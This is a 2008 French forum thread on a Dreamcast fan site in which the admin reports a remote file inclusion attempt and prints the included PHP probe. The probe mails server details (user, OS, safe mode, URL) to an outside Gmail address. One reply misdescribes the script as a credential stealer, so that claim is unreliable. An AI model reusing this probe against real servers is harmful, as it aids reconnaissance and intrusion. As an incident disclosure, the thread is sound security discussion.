Le forum de DreamAgain.fr

"Un site orienté Dreamcast"
http://forums-dreamagain.vibvib.fr/

Un baby hackeur particulier

http://forums-dreamagain.vibvib.fr/viewtopic.php?t=1387

Page 1 sur 1

Un baby hackeur particulier

Posté : 02 juil. 2008 15:27
par edd
En regardant l'activité louche du site. J'ai vu que Sylvain Chouquette a tenté d'inclure la page
http://rouquette.sylvain.free.fr/stage2003/tester.txt

Code : Tout sélectionner

<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// lupalupa
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Segurança</i> = " . $SafeMode . "
http://" . $delet . " 

SE FOR XEGADO DO LUPA TEM TUDO com: <u>delet</u>");
$email = "leandrro.mello@gmail.com";
$assunto = "MARAVILHA";
$email1 = "leandrro.mello@gmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "Não foi.";
exit();
}
?>
Je ne sais pas trop à quoi sert ce script ("scan inbox hotmail"?) mais je vois pas bien pourquoi tenté de l'incruster dans DA... Bref. En creusant, je suis tombé là-dessus http://gisele.rouquette.free.fr/blog/ (mauvaise piste, sans doute la maman de l'interessé, en fait une redirection depuis http://rouquette.sylvain.free.fr), puis là http://rouquette.sylvain.free.fr/stage2003/ , ce serait donc le "Président de l’association EpitAnime (plus de 200 membres) des années 2000 et 2001", ben dis-donc ;p

Bref, tout ça pour dire, évitez les tentatives d'inclusion de script surtout si le script en question est sur votre "page CV" ou le blog de votre maman...

(on peut me dire ce que fait ce script?)

Posté : 02 juil. 2008 15:36
par renkei
Déjà c'est espagnol je croit :P après....

Posté : 02 juil. 2008 17:32
par unchpkeb
c'est du portugais enfaite. aucune idee sinon..

Posté : 02 juil. 2008 20:40
par Venom
En fait ce sont des Brésiliens: http://www.zataz.com/interviews-securit ... fault.html

Je ne pense pas que ce malheureux sylvain ait fait ça mais plutôt qu'il a déjà fait les frais de ce groupe.

J'ai l'impression que ce script essaye de récupérer les login et mdp de l'admin du compte free.fr puis les envoi par mail à nos amis "hackers" en leur disant si le hack a réussi ou pas.

Si c'est possible il faudrait prévenir le pauvre sylvain pour qu'il corrige ça et que ces comiques évitent de passer par lui pour hacker d'autres sites...
Heures au format UTC+02:00
Page 1 sur 1

Développé par phpBB® Forum Software © phpBB Limited

Traduit par phpBB-fr.com